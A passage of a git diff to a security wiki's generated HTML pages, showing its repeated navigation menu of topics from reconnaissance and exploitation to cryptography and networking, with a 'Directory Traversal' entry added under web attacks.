        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -203,22 +203,6 @@

DNS - - diff --git a/docs/Networking/Protocols/Domain Name System (DNS)/The in-addr.arpa Domain.html b/docs/Networking/Protocols/Domain Name System (DNS)/The in-addr.arpa Domain.html index 20ce7a9c..e91a32de 100644 --- a/docs/Networking/Protocols/Domain Name System (DNS)/The in-addr.arpa Domain.html +++ b/docs/Networking/Protocols/Domain Name System (DNS)/The in-addr.arpa Domain.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Domain Name System (DNS)/index.html b/docs/Networking/Protocols/Domain Name System (DNS)/index.html index 2cb83328..fe77c40f 100644 --- a/docs/Networking/Protocols/Domain Name System (DNS)/index.html +++ b/docs/Networking/Protocols/Domain Name System (DNS)/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
